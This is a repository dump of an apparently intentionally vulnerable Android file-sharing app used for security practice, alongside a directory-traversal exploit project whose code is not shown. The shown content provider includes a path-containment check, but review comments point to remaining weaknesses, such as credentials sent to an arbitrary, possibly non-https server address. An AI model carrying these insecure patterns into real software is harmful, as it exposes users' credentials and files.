@if "%DEBUG%" == "" @echo off
@rem ##########################################################################
@rem
@rem Gradle startup script for Windows
@rem
@rem ##########################################################################
@rem Purpose: pick a java.exe and start org.gradle.wrapper.GradleWrapperMain from
@rem gradle\wrapper\gradle-wrapper.jar with the caller's arguments.

@rem Set local scope for the variables with windows NT shell
if "%OS%"=="Windows_NT" setlocal

set DIRNAME=%~dp0
if "%DIRNAME%" == "" set DIRNAME=.
set APP_BASE_NAME=%~n0
set APP_HOME=%DIRNAME%

@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script.
set DEFAULT_JVM_OPTS=

@rem Find java.exe
if defined JAVA_HOME goto findJavaFromJavaHome

set JAVA_EXE=java.exe
%JAVA_EXE% -version >NUL 2>&1
if "%ERRORLEVEL%" == "0" goto init

echo.
echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH.
echo.
echo Please set the JAVA_HOME variable in your environment to match the
echo location of your Java installation.

goto fail

:findJavaFromJavaHome
@rem Strip any double quotes from JAVA_HOME before building the executable path.
set JAVA_HOME=%JAVA_HOME:"=%
set JAVA_EXE=%JAVA_HOME%/bin/java.exe

if exist "%JAVA_EXE%" goto init

echo.
echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME%
echo.
echo Please set the JAVA_HOME variable in your environment to match the
echo location of your Java installation.

goto fail

:init
@rem Get command-line arguments, handling Windows variants

@rem Both outcomes of the next test reach the same label, which follows immediately.
if not "%OS%" == "Windows_NT" goto win9xME_args

:win9xME_args
@rem Slurp the command line arguments.
set CMD_LINE_ARGS=
set _SKIP=2

:win9xME_args_slurp
if "x%~1" == "x" goto execute

set CMD_LINE_ARGS=%*

:execute
@rem Setup the command line

@rem NOTE(review): the JVM is started from the wrapper jar checked in next to this script;
@rem verify that binary against the checksum Gradle publishes for this wrapper version.
set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar

@rem Execute Gradle
@rem NOTE(review): the JVM option variables are expanded unquoted into the command line,
@rem so they must come from a trusted environment.
"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS%

:end
@rem End local scope for the variables with windows NT shell
if "%ERRORLEVEL%"=="0" goto mainEnd

:fail
rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of
rem the _cmd.exe /c_ return code!
if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1
exit /b 1

:mainEnd
if "%OS%"=="Windows_NT" endlocal

:omega
85 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/settings.gradle:
--------------------------------------------------------------------------------
// Names the root project and registers its single module, :app.
rootProject.name='ExploitDirectoryTraversal'
include ':app'
3 |
--------------------------------------------------------------------------------
/FileApp/.gitignore:
--------------------------------------------------------------------------------
1 |
2 | # Created by https://www.gitignore.io/api/android,androidstudio
3 | # Edit at https://www.gitignore.io/?templates=android,androidstudio
4 |
5 | ### Android ###
6 | # Built application files
7 | *.apk
8 | *.ap_
9 | *.aab
10 |
11 | # Files for the ART/Dalvik VM
12 | *.dex
13 |
14 | # Java class files
15 | *.class
16 |
17 | # Generated files
18 | bin/
19 | gen/
20 | out/
21 | release/
22 |
23 | # Gradle files
24 | .gradle/
25 | build/
26 |
27 | # Local configuration file (sdk path, etc)
28 | local.properties
29 |
30 | # Proguard folder generated by Eclipse
31 | proguard/
32 |
33 | # Log Files
34 | *.log
35 |
36 | # Android Studio Navigation editor temp files
37 | .navigation/
38 |
39 | # Android Studio captures folder
40 | captures/
41 |
42 | # IntelliJ
43 | *.iml
44 | .idea/workspace.xml
45 | .idea/tasks.xml
46 | .idea/gradle.xml
47 | .idea/assetWizardSettings.xml
48 | .idea/dictionaries
49 | .idea/libraries
50 | # Android Studio 3 in .gitignore file.
51 | .idea/caches
52 | .idea/modules.xml
53 | # Comment next line if keeping position of elements in Navigation Editor is relevant for you
54 | .idea/navEditor.xml
55 |
56 | # Keystore files
57 | # Uncomment the following lines if you do not want to check your keystore files in.
58 | #*.jks
59 | #*.keystore
60 |
61 | # External native build folder generated in Android Studio 2.2 and later
62 | .externalNativeBuild
63 |
64 | # Google Services (e.g. APIs or Firebase)
65 | # google-services.json
66 |
67 | # Freeline
68 | freeline.py
69 | freeline/
70 | freeline_project_description.json
71 |
72 | # fastlane
73 | fastlane/report.xml
74 | fastlane/Preview.html
75 | fastlane/screenshots
76 | fastlane/test_output
77 | fastlane/readme.md
78 |
79 | # Version control
80 | vcs.xml
81 |
82 | # lint
83 | lint/intermediates/
84 | lint/generated/
85 | lint/outputs/
86 | lint/tmp/
87 | # lint/reports/
88 |
89 | ### Android Patch ###
90 | gen-external-apklibs
91 | output.json
92 |
93 | # Replacement of .externalNativeBuild directories introduced
94 | # with Android Studio 3.5.
95 | .cxx/
96 |
97 | ### AndroidStudio ###
98 | # Covers files to be ignored for android development using Android Studio.
99 |
100 | # Built application files
101 |
102 | # Files for the ART/Dalvik VM
103 |
104 | # Java class files
105 |
106 | # Generated files
107 |
108 | # Gradle files
109 | .gradle
110 |
111 | # Signing files
112 | .signing/
113 |
114 | # Local configuration file (sdk path, etc)
115 |
116 | # Proguard folder generated by Eclipse
117 |
118 | # Log Files
119 |
120 | # Android Studio
121 | /*/build/
122 | /*/local.properties
123 | /*/out
124 | /*/*/build
125 | /*/*/production
126 | *.ipr
127 | *~
128 | *.swp
129 |
130 | # Android Patch
131 |
132 | # External native build folder generated in Android Studio 2.2 and later
133 |
134 | # NDK
135 | obj/
136 |
137 | # IntelliJ IDEA
138 | *.iws
139 | /out/
140 |
141 | # User-specific configurations
142 | .idea/caches/
143 | .idea/libraries/
144 | .idea/shelf/
145 | .idea/.name
146 | .idea/compiler.xml
147 | .idea/copyright/profiles_settings.xml
148 | .idea/encodings.xml
149 | .idea/misc.xml
150 | .idea/scopes/scope_settings.xml
151 | .idea/vcs.xml
152 | .idea/jsLibraryMappings.xml
153 | .idea/datasources.xml
154 | .idea/dataSources.ids
155 | .idea/sqlDataSources.xml
156 | .idea/dynamic.xml
157 | .idea/uiDesigner.xml
158 |
159 | # OS-specific files
160 | .DS_Store
161 | .DS_Store?
162 | ._*
163 | .Spotlight-V100
164 | .Trashes
165 | ehthumbs.db
166 | Thumbs.db
167 |
168 | # Legacy Eclipse project files
169 | .classpath
170 | .project
171 | .cproject
172 | .settings/
173 |
174 | # Mobile Tools for Java (J2ME)
175 | .mtj.tmp/
176 |
177 | # Package Files #
178 | *.war
179 | *.ear
180 |
181 | # virtual machine crash logs (Reference: http://www.java.com/en/download/help/error_hotspot.xml)
182 | hs_err_pid*
183 |
184 | ## Plugin-specific files:
185 |
186 | # mpeltonen/sbt-idea plugin
187 | .idea_modules/
188 |
189 | # JIRA plugin
190 | atlassian-ide-plugin.xml
191 |
192 | # Mongo Explorer plugin
193 | .idea/mongoSettings.xml
194 |
195 | # Crashlytics plugin (for Android Studio and IntelliJ)
196 | com_crashlytics_export_strings.xml
197 | crashlytics.properties
198 | crashlytics-build.properties
199 | fabric.properties
200 |
201 | ### AndroidStudio Patch ###
202 |
203 | !/gradle/wrapper/gradle-wrapper.jar
204 |
205 | # End of https://www.gitignore.io/api/android,androidstudio
206 |
--------------------------------------------------------------------------------
/FileApp/.idea/codeStyles/Project.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 | xmlns:android
14 |
15 | ^$
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 | xmlns:.*
25 |
26 | ^$
27 |
28 |
29 | BY_NAME
30 |
31 |
32 |
33 |
34 |
35 |
36 | .*:id
37 |
38 | http://schemas.android.com/apk/res/android
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 | .*:name
48 |
49 | http://schemas.android.com/apk/res/android
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 | name
59 |
60 | ^$
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 | style
70 |
71 | ^$
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 | .*
81 |
82 | ^$
83 |
84 |
85 | BY_NAME
86 |
87 |
88 |
89 |
90 |
91 |
92 | .*
93 |
94 | http://schemas.android.com/apk/res/android
95 |
96 |
97 | ANDROID_ATTRIBUTE_ORDER
98 |
99 |
100 |
101 |
102 |
103 |
104 | .*
105 |
106 | .*
107 |
108 |
109 | BY_NAME
110 |
111 |
112 |
113 |
114 |
115 |
116 |
--------------------------------------------------------------------------------
/FileApp/.idea/runConfigurations.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/FileApp/app/.gitignore:
--------------------------------------------------------------------------------
1 | /build
2 |
--------------------------------------------------------------------------------
/FileApp/app/build.gradle:
--------------------------------------------------------------------------------
// Build configuration for the FileApp application module.
apply plugin: 'com.android.application'

android {
    compileSdkVersion 29
    buildToolsVersion "29.0.3"

    defaultConfig {
        applicationId "dev.d0nut.vuln.fileapp"
        minSdkVersion 24
        targetSdkVersion 29
        versionCode 1
        versionName "1.0"

        testInstrumentationRunner "androidx.test.runner.AndroidJUnitRunner"
    }

    buildTypes {
        // NOTE(review): code shrinking is switched off for release and on for debug,
        // the reverse of the usual arrangement. Confirm this is intentional.
        release {
            minifyEnabled false
            proguardFiles getDefaultProguardFile('proguard-android-optimize.txt'), 'proguard-rules.pro'
        }
        debug {
            minifyEnabled true
            proguardFiles getDefaultProguardFile('proguard-android-optimize.txt'), 'proguard-rules.pro'
        }
    }

    viewBinding {
        enabled = true
    }
}

dependencies {
    // Every jar placed in app/libs is added to the classpath as-is; these are not
    // resolved from a repository, so they carry no declared version.
    implementation fileTree(dir: 'libs', include: ['*.jar'])

    // Runtime libraries
    implementation 'androidx.appcompat:appcompat:1.1.0'
    implementation 'androidx.constraintlayout:constraintlayout:1.1.3'
    implementation 'androidx.recyclerview:recyclerview:1.1.0'
    implementation 'com.android.volley:volley:1.1.1'

    // Local unit tests
    testImplementation 'junit:junit:4.12'

    // On-device instrumented tests
    androidTestImplementation 'androidx.test.ext:junit:1.1.1'
    androidTestImplementation 'androidx.test.espresso:espresso-core:3.2.0'
}
44 |
--------------------------------------------------------------------------------
/FileApp/app/proguard-rules.pro:
--------------------------------------------------------------------------------
1 | # Add project specific ProGuard rules here.
2 | # You can control the set of applied configuration files using the
3 | # proguardFiles setting in build.gradle.
4 | #
5 | # For more details, see
6 | # http://developer.android.com/guide/developing/tools/proguard.html
7 |
8 | # If your project uses WebView with JS, uncomment the following
9 | # and specify the fully qualified class name to the JavaScript interface
10 | # class:
11 | #-keepclassmembers class fqcn.of.javascript.interface.for.webview {
12 | # public *;
13 | #}
14 |
15 | # Uncomment this to preserve the line number information for
16 | # debugging stack traces.
17 | #-keepattributes SourceFile,LineNumberTable
18 |
19 | # If you keep the line number information, uncomment this to
20 | # hide the original source file name.
21 | #-renamesourcefileattribute SourceFile
22 |
--------------------------------------------------------------------------------
/FileApp/app/src/androidTest/java/dev/d0nut/vuln/fileapp/ExampleInstrumentedTest.java:
--------------------------------------------------------------------------------
1 | package dev.d0nut.vuln.fileapp;
2 |
3 | import android.content.Context;
4 |
5 | import androidx.test.platform.app.InstrumentationRegistry;
6 | import androidx.test.ext.junit.runners.AndroidJUnit4;
7 |
8 | import org.junit.Test;
9 | import org.junit.runner.RunWith;
10 |
11 | import static org.junit.Assert.*;
12 |
/**
 * Instrumented test that runs on an Android device.
 *
 * <p>See the Android testing documentation for how instrumented tests are executed.
 */
@RunWith(AndroidJUnit4.class)
public class ExampleInstrumentedTest {
    /** Checks that the context of the app under test reports the expected package name. */
    @Test
    public void useAppContext() {
        final String packageName = InstrumentationRegistry
                .getInstrumentation()
                .getTargetContext()
                .getPackageName();

        assertEquals("dev.d0nut.vuln.fileapp", packageName);
    }
}
28 |
--------------------------------------------------------------------------------
/FileApp/app/src/main/AndroidManifest.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/FileApp/app/src/main/java/dev/d0nut/vuln/fileapp/ConfigActivity.java:
--------------------------------------------------------------------------------
1 | package dev.d0nut.vuln.fileapp;
2 |
3 | import android.app.Activity;
4 | import android.content.SharedPreferences;
5 | import android.os.Bundle;
6 | import android.view.View;
7 |
8 | import androidx.annotation.Nullable;
9 |
10 | import dev.d0nut.vuln.fileapp.databinding.ActivityConfigBinding;
11 |
/**
 * Settings screen with a single field that holds the backend server address.
 *
 * <p>The address is read from the app's private SharedPreferences in
 * {@link #onResume()} and written back in {@link #onPause()}.
 *
 * <p>NOTE(review): the value is stored exactly as typed. Nothing in this class checks
 * the scheme or host, and the other activities prepend it to their API paths, so
 * confirm where (if anywhere) an https-only rule is enforced.
 */
public class ConfigActivity extends Activity {
    /** Name of the SharedPreferences file that holds the app settings. */
    public static final String PREFERENCES = "preferences";
    /** Preference key under which the server address is stored. */
    public static final String SERVER_ADDRESS = "server_address";
    private ActivityConfigBinding binding;

    @Override
    protected void onCreate(@Nullable Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        binding = ActivityConfigBinding.inflate(getLayoutInflater());
        setContentView(binding.getRoot());

        // The back button only closes the screen; the value is saved in onPause().
        View.OnClickListener closeScreen = new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                finish();
            }
        };
        binding.backButton.setOnClickListener(closeScreen);
    }

    /** Shows the stored server address, or an empty field when none has been saved. */
    @Override
    protected void onResume() {
        super.onResume();

        SharedPreferences prefs = getSharedPreferences(PREFERENCES, MODE_PRIVATE);
        binding.serverAddressField.setText(prefs.getString(SERVER_ADDRESS, ""));
    }

    /** Persists whatever is currently in the address field. */
    @Override
    protected void onPause() {
        super.onPause();

        saveServerAddress(binding.serverAddressField.getText().toString());
    }

    /**
     * Stores the server address in the private preferences file.
     *
     * @param serverAddress text to store under {@link #SERVER_ADDRESS}
     */
    private void saveServerAddress(String serverAddress) {
        getSharedPreferences(PREFERENCES, MODE_PRIVATE)
                .edit()
                .putString(SERVER_ADDRESS, serverAddress)
                .apply();
    }
}
56 |
--------------------------------------------------------------------------------
/FileApp/app/src/main/java/dev/d0nut/vuln/fileapp/CustomContentProvider.java:
--------------------------------------------------------------------------------
1 | package dev.d0nut.vuln.fileapp;
2 |
3 | import android.content.ContentProvider;
4 | import android.content.ContentValues;
5 | import android.database.Cursor;
6 | import android.net.Uri;
7 | import android.os.ParcelFileDescriptor;
8 |
9 | import androidx.annotation.NonNull;
10 | import androidx.annotation.Nullable;
11 |
12 | import java.io.File;
13 | import java.io.FileNotFoundException;
14 |
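/**
 * Content provider that hands out file descriptors for files stored under the
 * app's private files directory.
 *
 * <p>Only {@link #openFile(Uri, String)} does real work; the query, insert, update
 * and delete callbacks are stubs. The URI is supplied by the calling app and is
 * treated as untrusted input. Whether other apps can reach this provider depends on
 * its manifest declaration, which is not visible from this class.
 */
public class CustomContentProvider extends ContentProvider {
    @Override
    public boolean onCreate() {
        return true;
    }

    /** Not supported; always returns {@code null}. */
    @Nullable
    @Override
    public Cursor query(@NonNull Uri uri, @Nullable String[] projection, @Nullable String selection, @Nullable String[] selectionArgs, @Nullable String sortOrder) {
        return null;
    }

    /** No MIME type is reported; always returns {@code null}. */
    @Nullable
    @Override
    public String getType(@NonNull Uri uri) {
        return null;
    }

    /** Not supported; always returns {@code null}. */
    @Nullable
    @Override
    public Uri insert(@NonNull Uri uri, @Nullable ContentValues values) {
        return null;
    }

    /** Not supported; always reports zero rows deleted. */
    @Override
    public int delete(@NonNull Uri uri, @Nullable String selection, @Nullable String[] selectionArgs) {
        return 0;
    }

    /** Not supported; always reports zero rows updated. */
    @Override
    public int update(@NonNull Uri uri, @Nullable ContentValues values, @Nullable String selection, @Nullable String[] selectionArgs) {
        return 0;
    }

    /**
     * Opens the file named by the URI path, resolved inside the app's files directory.
     *
     * <p>The resolved location is canonicalised and must stay inside the files
     * directory. Without that check, a path containing {@code ..} segments would
     * resolve to a file outside it. The descriptor is opened with the access the
     * caller asked for rather than always read-write.
     *
     * @param uri  URI whose path names the file, relative to the files directory
     * @param mode access mode string requested by the caller
     * @return a descriptor for the requested file
     * @throws FileNotFoundException if the URI has no path, the path cannot be
     *                               resolved, or the file cannot be opened
     * @throws SecurityException     if the resolved path is not inside the files directory
     */
    @Override
    public ParcelFileDescriptor openFile(@NonNull Uri uri, @NonNull String mode) throws FileNotFoundException {
        String requestedPath = uri.getPath();
        if (requestedPath == null) {
            throw new FileNotFoundException("No path in URI: " + uri);
        }

        final File baseDir;
        final File target;
        try {
            // Canonical form resolves "." and ".." segments and symbolic links, so the
            // containment check below compares real locations rather than raw strings.
            baseDir = getContext().getFilesDir().getCanonicalFile();
            target = new File(baseDir, requestedPath).getCanonicalFile();
        } catch (java.io.IOException e) {
            throw new FileNotFoundException("Cannot resolve path for " + uri);
        }

        // The trailing separator keeps a sibling such as "<files>-other" from passing
        // as a prefix match of "<files>".
        if (!target.getPath().startsWith(baseDir.getPath() + File.separator)) {
            throw new SecurityException("Path is not inside the files directory: " + uri);
        }

        // Honour the requested mode so a read request does not yield a writable descriptor.
        return ParcelFileDescriptor.open(target, ParcelFileDescriptor.parseMode(mode));
    }
}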
62 |
--------------------------------------------------------------------------------
/FileApp/app/src/main/java/dev/d0nut/vuln/fileapp/FileApplication.java:
--------------------------------------------------------------------------------
1 | package dev.d0nut.vuln.fileapp;
2 |
3 | import android.app.Application;
4 |
5 | import com.android.volley.RequestQueue;
6 | import com.android.volley.toolbox.Volley;
7 |
/** Application subclass that owns the Volley request queue used by the activities. */
public class FileApplication extends Application {
    /** Assigned in {@link #onCreate()}; activities reach it by casting {@code getApplication()}. */
    public RequestQueue requestQueue;

    @Override
    public void onCreate() {
        super.onCreate();
        // One queue for the whole process, created with the application context.
        this.requestQueue = Volley.newRequestQueue(this);
    }
}
17 |
--------------------------------------------------------------------------------
/FileApp/app/src/main/java/dev/d0nut/vuln/fileapp/FileListActivity.java:
--------------------------------------------------------------------------------
1 | package dev.d0nut.vuln.fileapp;
2 |
3 | import android.app.Activity;
4 | import android.content.Context;
5 | import android.content.Intent;
6 | import android.os.Bundle;
7 | import android.view.LayoutInflater;
8 | import android.view.View;
9 | import android.view.ViewGroup;
10 | import android.widget.ArrayAdapter;
11 | import android.widget.ImageView;
12 | import android.widget.TextView;
13 | import android.widget.Toast;
14 |
15 | import androidx.annotation.NonNull;
16 | import androidx.annotation.Nullable;
17 |
18 | import com.android.volley.Request;
19 | import com.android.volley.Response;
20 | import com.android.volley.VolleyError;
21 | import com.android.volley.toolbox.JsonObjectRequest;
22 |
23 | import org.json.JSONArray;
24 | import org.json.JSONException;
25 | import org.json.JSONObject;
26 |
27 | import java.util.ArrayList;
28 |
29 | import dev.d0nut.vuln.fileapp.databinding.ActivityFilesBinding;
30 |
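/**
 * Lists the files the server reports for the session token passed in the launching intent.
 *
 * <p>The token is read from the {@code "token"} intent extra and posted to
 * {@code <server address>/api/files}. File names and MIME types in the response come
 * from the server and are displayed as received.
 */
public class FileListActivity extends Activity {
    private ActivityFilesBinding binding;
    private FileListAdapter adapter;

    @Override
    protected void onCreate(@Nullable Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        binding = ActivityFilesBinding.inflate(getLayoutInflater());
        View view = binding.getRoot();
        setContentView(view);

        adapter = new FileListAdapter(this, R.layout.item_file);
        binding.fileList.setAdapter(adapter);

        Intent callingIntent = getIntent();
        fetchFiles(callingIntent.getStringExtra("token"));
    }

    /**
     * Requests the file list and fills the adapter with the result.
     *
     * <p>The activity is closed when no server address is configured, when the request
     * body cannot be built, when the request fails, or when the response cannot be parsed.
     *
     * @param token session token sent to the server in the request body
     */
    private void fetchFiles(String token) {
        String serverAddress = getSharedPreferences(ConfigActivity.PREFERENCES, MODE_PRIVATE).getString(ConfigActivity.SERVER_ADDRESS, null);

        // Without a configured address the URL would be built from the text "null".
        if (serverAddress == null || serverAddress.isEmpty()) {
            finish();
            return;
        }

        JSONObject body = new JSONObject();

        try {
            body.put("token", token);
        } catch (JSONException e) {
            // Stop here: previously the request was still queued after finish().
            finish();
            return;
        }

        JsonObjectRequest request = new JsonObjectRequest(Request.Method.POST, serverAddress + "/api/files", body, new Response.Listener<JSONObject>() {
            @Override
            public void onResponse(JSONObject response) {
                try {
                    ArrayList<AppFile> files = new ArrayList<>();
                    JSONArray array = response.getJSONArray("data");

                    for (int i = 0; i < array.length(); i++) {
                        JSONObject item = array.getJSONObject(i);
                        String name = item.getString("name");
                        String mime = item.getString("mime");

                        files.add(new AppFile(name, mime));
                    }

                    adapter.addAll(files);
                    adapter.notifyDataSetChanged();
                } catch (JSONException e) {
                    // Malformed response: nothing to show.
                    finish();
                }
            }
        }, new Response.ErrorListener() {
            @Override
            public void onErrorResponse(VolleyError error) {
                finish();
            }
        });

        ((FileApplication) getApplication()).requestQueue.add(request);
    }


    /** Adapter that renders each {@link AppFile} as an icon plus the file name. */
    class FileListAdapter extends ArrayAdapter<AppFile> {
        ArrayList<AppFile> files = new ArrayList<>();

        public FileListAdapter(@NonNull Context context, int resource) {
            super(context, resource);
        }

        @NonNull
        @Override
        public View getView(int position, @Nullable View convertView, @NonNull ViewGroup parent) {
            // Inflate a row only when there is no recycled view to reuse.
            if (convertView == null) {
                convertView = getLayoutInflater().inflate(R.layout.item_file, parent, false);
            }

            ImageView icon = convertView.findViewById(R.id.item_type_icon);
            TextView name = convertView.findViewById(R.id.file_name);

            AppFile appFile = getItem(position);

            icon.setImageDrawable(getResources().getDrawable(getResourceIdForMime(appFile.mime)));
            name.setText(appFile.name);

            return convertView;
        }

        /**
         * Picks an icon by substring match on the MIME type.
         *
         * @param mime MIME type string reported by the server
         * @return drawable resource id, falling back to the donut icon for unknown types
         */
        private int getResourceIdForMime(String mime) {
            if (mime.contains("image/")) {
                return R.drawable.icon_image;
            } else if (mime.contains("excel")) {
                return R.drawable.icon_excel;
            } else if (mime.contains("pdf")) {
                return R.drawable.icon_pdf;
            } else if (mime.contains("document")) {
                // docx
                return R.drawable.icon_document;
            } else {
                return R.drawable.donut;
            }
        }
    }

    /** Name and MIME type of one file as reported by the server. */
    class AppFile {
        public String name;
        public String mime;

        public AppFile(String name, String mime) {
            this.name = name;
            this.mime = mime;
        }
    }
}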
152 |
--------------------------------------------------------------------------------
/FileApp/app/src/main/java/dev/d0nut/vuln/fileapp/LoginActivity.java:
--------------------------------------------------------------------------------
1 | package dev.d0nut.vuln.fileapp;
2 |
3 | import android.app.Activity;
4 | import android.content.Context;
5 | import android.content.Intent;
6 | import android.os.Bundle;
7 | import android.view.View;
8 | import android.view.inputmethod.InputMethodManager;
9 | import android.widget.Toast;
10 |
11 | import androidx.annotation.Nullable;
12 |
13 | import com.android.volley.Request;
14 | import com.android.volley.Response;
15 | import com.android.volley.VolleyError;
16 | import com.android.volley.toolbox.JsonObjectRequest;
17 |
18 | import org.json.JSONException;
19 | import org.json.JSONObject;
20 |
21 | import dev.d0nut.vuln.fileapp.databinding.ActivityMainBinding;
22 |
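/**
 * Login screen: posts the entered credentials to {@code <server address>/api/auth} and,
 * on success, starts {@link FileListActivity} with the returned token as an intent extra.
 *
 * <p>NOTE(review): the URL scheme comes from the user-entered server address and nothing
 * in this class requires https. Confirm that cleartext traffic is blocked elsewhere,
 * since the password is sent in the request body.
 */
public class LoginActivity extends Activity {

    private ActivityMainBinding binding;

    @Override
    protected void onCreate(@Nullable Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        binding = ActivityMainBinding.inflate(getLayoutInflater());
        View view = binding.getRoot();
        setContentView(view);

        binding.loginButton.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {

                String username = binding.usernameField.getText().toString();
                String password = binding.passwordField.getText().toString();

                if (username.isEmpty() || password.isEmpty()) {
                    // Nothing to submit.
                    return;
                }

                // Clear the field as soon as the value has been read.
                binding.passwordField.setText("");

                binding.loginProgress.setVisibility(View.VISIBLE);
                dismissKeyboard();

                doLogin(username, password);
            }
        });

        binding.buttonConfig.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                startActivity(new Intent(LoginActivity.this, ConfigActivity.class));
            }
        });
    }

    /**
     * Sends the credentials to the configured server and reacts to the answer.
     *
     * @param username user name entered in the form
     * @param password password entered in the form
     */
    private void doLogin(String username, String password) {
        String serverAddress = getSharedPreferences(ConfigActivity.PREFERENCES, MODE_PRIVATE).getString(ConfigActivity.SERVER_ADDRESS, null);

        // Without a configured address the URL would be built from the text "null".
        if (serverAddress == null || serverAddress.isEmpty()) {
            binding.loginProgress.setVisibility(View.INVISIBLE);
            showError(R.string.error_unknown_error);
            return;
        }

        JSONObject body = new JSONObject();

        try {
            body.put("username", username);
            body.put("password", password);
        } catch (JSONException e) {
            binding.loginProgress.setVisibility(View.INVISIBLE);
            return;
        }

        JsonObjectRequest request = new JsonObjectRequest(Request.Method.POST, serverAddress + "/api/auth", body, new Response.Listener<JSONObject>() {
            @Override
            public void onResponse(JSONObject response) {
                binding.loginProgress.setVisibility(View.INVISIBLE);

                try {
                    if (response.getBoolean("success")) {
                        String token = response.getJSONObject("data").getString("token");

                        Intent intent = new Intent(LoginActivity.this, FileListActivity.class);
                        intent.putExtra("token", token);
                        startActivity(intent);
                    } else {
                        showError(R.string.error_unknown_error);
                    }
                } catch (JSONException e) {
                    showError(R.string.error_unknown_error);
                }
            }
        }, new Response.ErrorListener() {
            @Override
            public void onErrorResponse(VolleyError error) {
                binding.loginProgress.setVisibility(View.INVISIBLE);

                // networkResponse is null when no HTTP response arrived (for example a
                // timeout or an unreachable host); dereferencing it unchecked crashed here.
                boolean rejected = error.networkResponse != null
                        && error.networkResponse.statusCode == 401;

                showError(rejected ? R.string.error_invalid_auth : R.string.error_unknown_error);
            }
        });

        ((FileApplication) getApplication()).requestQueue.add(request);
    }

    /** Shows a short toast with the given string resource. */
    private void showError(int messageId) {
        Toast.makeText(getApplicationContext(), getResources().getString(messageId), Toast.LENGTH_SHORT).show();
    }

    /** Hides the soft keyboard for both input fields. */
    private void dismissKeyboard() {
        InputMethodManager imm = (InputMethodManager) getSystemService(Context.INPUT_METHOD_SERVICE);
        imm.hideSoftInputFromWindow(binding.passwordField.getWindowToken(), 0);
        imm.hideSoftInputFromWindow(binding.usernameField.getWindowToken(), 0);
    }
}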
123 |
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/drawable-v24/ic_launcher_foreground.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/drawable/back.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/drawable/back.png
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/drawable/donut.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/drawable/donut.png
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/drawable/folder.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/drawable/folder.png
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/drawable/gear.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/drawable/gear.png
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/drawable/ic_launcher_background.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/drawable/icon_document.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/drawable/icon_document.png
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/drawable/icon_excel.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/drawable/icon_excel.png
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/drawable/icon_image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/drawable/icon_image.png
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/drawable/icon_pdf.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/drawable/icon_pdf.png
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/layout/activity_config.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/layout/activity_files.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/layout/activity_main.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/layout/item_file.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/mipmap-anydpi-v26/ic_launcher.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/mipmap-anydpi-v26/ic_launcher_round.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/mipmap-hdpi/ic_launcher.png:
--------------------------------------------------------------------------------
